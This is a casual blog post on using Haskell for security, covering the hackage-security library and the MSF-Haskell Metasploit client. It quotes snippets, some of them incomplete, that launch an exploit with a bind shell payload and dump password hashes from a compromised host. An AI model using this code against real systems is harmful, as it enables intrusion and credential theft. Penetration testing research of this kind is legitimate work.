Security with Haskell



Tiempo de lectura ~ 2 minutos

From “you are crazy” to “why even?” are some of the things my friends in the computer science environment have told me when I started working with Haskell in general and security in particular. Answering in order, yes I’m crazy but not because of Haskell and well, there’s a reason why I chose to use Haskell for security. First of all, functional programming is the new black and probably more and more apps will be build using it. Choosing a pure functional language for security is not that crazy. On the other hand, the mathematical approaching Haskell has is very useful in cryptography.

So, how can I use Haskell for auditoring security?

I’d like to point here to an specific library called hackage-security which, currently supports only index signing. As described in the wiki, The library has two main entry points: Hackage.Security.Client is the main entry point for clients, and Hackage.Security.Server is the main entry point for servers. It is worth a check.

Apart from this, there’s also a repository in github called MSF-Haskell that allows performing Penetration testing with haskell. It also includes a script in haskell as an example, and the whole whitepaper, too. It’s actually an implementation of the Metasploit API which makes developers able to write Haskell clients that communicate with the Metasploit server. For example, in the part of the example script, launches an example exploit against a target host.

launchExploit :: (LoudCxt s) => Host Attackable -> MSF s ()
launchExploit targetHost = do
  _ <- module_execute metasploitableModuleType metasploitableModuleName
      $ toObject
      $ Map.fromList
          [ ("RHOST",   toObject targetHost)
          , ("PAYLOAD", toObject metasploitablePayload)
  return ()

And we previously defined the payload itself:

metasploitablePayload = Payload "cmd/unix/bind_perl"

Or this part for grabbing password hashes:

gatherCredentials :: (LoudCxt s) => SessionId -> MSF s ()
gatherCredentials sessionId = do
  let modTyp = PostModuleType
      modNm = ModuleName "linux/gather/hashdump"

  r <- module_execute modTyp modNm
      $ toObject
      $ Map.fromList
          [ ("SESSION",   toObject sessionId)
  case r of
    (ExecJobId j) -> waitJob j
    _             -> return ()

To sum up, Haskell could be an option for functional scripting in security. [Maybe]( good_option, you know, just an option or nothing, haha functional joke, badum tss.

Anyway these are brand new type of attacks! even from a scratch, and not using API’s implementations such as before described. Speaking about crypto, this repo is interesting, as it handles elliptic curves encryption. Welp, I invite you all to take a look to cryptography repos in the official Haskell web, as well as the security repos. I’m still investigating, so if anyone is working on the same field here, please provide more info!

Also written in: